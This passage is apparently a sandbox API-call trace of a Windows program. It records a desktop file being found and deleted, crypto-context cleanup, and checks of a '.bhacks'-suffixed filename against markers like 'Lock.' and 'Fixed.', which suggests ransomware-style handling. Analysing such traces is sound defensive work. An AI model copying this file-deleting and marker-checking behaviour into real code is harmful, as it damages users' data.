lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.357] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0101.357] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.357] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.357] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.357] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.357] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.357] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.357] FreeLibrary (hLibModule=0x76390000) returned 1 [0101.357] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.357] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.357] CloseHandle (hObject=0x458) returned 1 [0101.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.358] CloseHandle (hObject=0x44c) returned 1 [0101.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.362] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.362] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.362] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.362] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i6 iY_C6BkJ.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a", lpFilePart=0x8cedf4*="i6 iY_C6BkJ.m4a") returned 0x27 [0101.362] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\i6 iy_c6bkj.m4a")) returned 0x20 [0101.362] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 0x9a3b80 [0101.363] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\i6 iy_c6bkj.m4a")) returned 1 [0101.418] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 0 [0101.418] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.418] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0101.419] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.419] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66b8 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66b8 | out: hHeap=0x2af0000) returned 1 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0101.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eadf0 [0101.420] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i6 iY_C6BkJ.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a", lpFilePart=0x8cf650*="i6 iY_C6BkJ.m4a") returned 0x27 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eadf0 | out: hHeap=0x2af0000) returned 1 [0101.420] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6 iY_C6BkJ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\i6 iy_c6bkj.m4a")) returned 0xffffffff [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0101.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j51yJlAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="51yJlAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1yJlAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yJlAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JlAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lAI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AI1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0101.421] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6680 [0101.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j51yJlAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="51yJlAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1yJlAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yJlAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JlAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lAI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AI1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.423] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0101.423] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0101.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0101.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.424] 